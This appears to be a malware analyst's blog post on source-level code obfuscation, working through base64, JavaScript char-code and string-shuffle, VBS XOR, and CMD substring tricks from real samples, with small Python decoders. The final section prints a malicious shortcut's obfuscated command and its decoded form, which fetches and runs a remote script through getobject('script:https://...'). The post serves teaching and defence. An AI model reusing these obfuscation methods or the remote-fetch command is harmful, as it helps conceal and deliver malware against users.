Obfuscation is often used by malware samples to hide their SECRETs, but we know how to uncover them. Want to know as well? Check our guide here.

A Bit More On Code Obfuscation

I recently published my analysis on the Netwalker Ransomware, which included the deobfuscation step Check it here. I think that (de)obfuscation techniques is an interesting subject, so I decided to write a little bit more about it.

There are basically two types of obfuscation techniques:

  • Binary Level: These are binary transformations to hide instructions and data inside binaries. It is usually implemented by binary packers, often used by malware.
  • Source Code Level: These are source code transformations to hide the program's statements. These are often used by malicious scripts.

In this draft, I will consider only the last case.

The techniques may be varied, so I will start from the simplest. Some time ago I found the following string on a binary:

GET <domain>/<api>/?DetectPlugin=TuNv&DetectAntiVirus=T0ZG

It is clear that this malware notifies its C&C about the infected machine's characteristics, but what are the argument's values? Well, if you are used to malware, you might guess it is a base64 encoder.

After a base64 -d you get:

DetectPlugin=Não
DetectAntiVirus=OFF

And then you discover that this malware notified the C&C that the infected machine did not have security solutions (AV or protection plugins) installed. (OK, this was my sandbox, so it is fine!)

OK, this one was easy, only a standard tool was required. Let's now move to a custom solution. Take a look at this JavaScript excerpt:

var f = String.fromCharCode(731 - 699, 817 - 699, 796 - 699, 813 - 699, 731 - 699, 820 - 699,
eval(f);

This code builds a string from chars generated in runtime as result of simple computations, as follows:

var f = String.fromCharCode(32, 118, 97, 114, 32, 121, ...
eval(f);

This is a very simple string manipulation technique, although effective to bypass many verification routines. The computation will lead to the following result:

var y ...

The variable declaration was hidden in this string. Although not very resilient, this approach is very scalable: notice that 699 is a constant. An attacker might easily get a new encoding by changing the code to a new constant.

Attackers might also employ a bit more complex techniques. Look at this Visual Basic Script (VBS) excerpt:

set objShell = CreateObject(CryptXor("c0+\4","N0X") & ".Application")

The object is instantiated from an encoded string and a key. Luckily for us, the scripts must contain the decryption routines embedded into themselves to be functional. Therefore, we can interpret it and decrypt the string. Although we could use the own script, I opted to implement my own decrypter:

def CryptXor(StringUse,Password):
retstr=""
for i in xrange(1,len(StringUse)+1):
    c_use=StringUse[i-1]
    c_pwd=Password[i % len(Password)]
    retstr=retstr+chr(ord(c_use) ^ ord(c_pwd))
return retstr

Thus, if we decrypt it:

python CryptXor.py "c0+\4" "N0X"
  ('c0+\\4', 'N0X', 'Shell')

We identify that the encoded string hosts the Shell keyword that will be instantiated.

This type of technique is not limited to any specific language, such as VBS. I following present a JavaScript example:

var Owj = krs('vonyjtznkfuxwmseruhibrlcartdcqtcgpoos').substr(0, Uhk);

Following the same procedure: writing the decoder based on their own source code.

def dec(z):
u=269863
for q in xrange(0,len(z)):
    i=u*(q+118)+(u%39272)
    f=u*(q+177)+(u%44074)
    r = i % len(z)
    j = f % len(z)
    y = z[r]
    z[r]=z[j]
    z[j]=y
    u=(i+f) % 4206333
return z
print(''.join(dec(list(sys.argv[1]))[:11]))

When we run it:

python decode.py vonyjtznkfuxwmseruhibrlcartdcqtcgpoos
constructor

We discover that the string holds a constructor keyword for the malicious class.

Finally, a bit more complex example. Some time ago I received a malicious LNK file (ya, Windows shortcuts!). If we parse it using an lnk parsing tool check here, we get the following target command:

commandLineArguments: /c "sET WKD=%wDRFDWINDRFDWdIDRFDWr%\DRFDWExDRFDWpLDRFDWoRDRFDWEr DRFDW/cDRFDW,&&sET CAG=GeIKMLPWtOIKMLPWbjeIKMLPWct(IKMLPW'scIKMLPWriIKMLPWpt:IKMLPWhTtIKMLPWPSIKMLPW:&&sET Fbi8kEi=1FOAS1FOASe647on3aeqh.30e29124934178cf14e.ga1FOAS?011FOAS')&&sET/^p xmfq9Lx="%CAG:IKMLPW=%%Fbi8kEi:1FOAS=/%"<NUL > C:\Users\Public\Pictures\njuarb4.js|md ^\ ^||CAll %WKD:DRFDW=% C:\Users\Public\Pictures\njuarb4.js|exit"

It is an obfuscated CMD/bat script. Let's consider the individual statements for a better readability:

set wkd=%wdrfdwindrfdwdidrfdwr%\drfdwexdrfdwpldrfdwordrfdwer drfdw/cdrfdw,
set cag=geikmlpwtoikmlpwbjeikmlpwct(ikmlpw'scikmlpwriikmlpwpt:ikmlpwhttikmlpwpsikmlpw:
set fbi8kei=1foas1foase647on3aeqh.30e29124934178cf14e.ga1foas?011foas')
set/^p xmfq9lx=%cag:ikmlpw=%%fbi8kei:1foas=/%<nul > c:\users\public\pictures\njuarb4.js|md ^\ ^

We see that the obfuscation technique is basically substring manipulation. Each statement is set to a variable and further referenced as part of the next string.

Am employed trick is to split the formed string in tokens. Notice in the following statement that the 1foas key is repeated in the beginning and in the end of the string. This will be stripped when this string is referenced in the statement.

set fbi8kei=1foas1foase647on3aeqh.30e29124934178cf14e.ga1foas?011foas')

If we perform this variable replacement procedure, we get:

getobject('script:https://e647on3aeqh.30e29124934178cf14e.ga')<nul > c:\users\public\pictures\njuarb4.js|md ^\ ^|| call\explorer /c,c:\users\public\pictures\njuarb4.js|exit

The actual malicious action.

In the end, code obfuscation is just a way to confuse analysts and consume analyst's and solution's processing time. Join me to research automatic deobfuscation techniques.

view raw obfuscation.md hosted with ❤ by GitHub

About the Authors

Marcus Botacin
PhD Student at Federal University of Paraná | Website | + posts

Computer Eng. @UNICAMP, 2015
MSc, CS @UNICAMP, 2017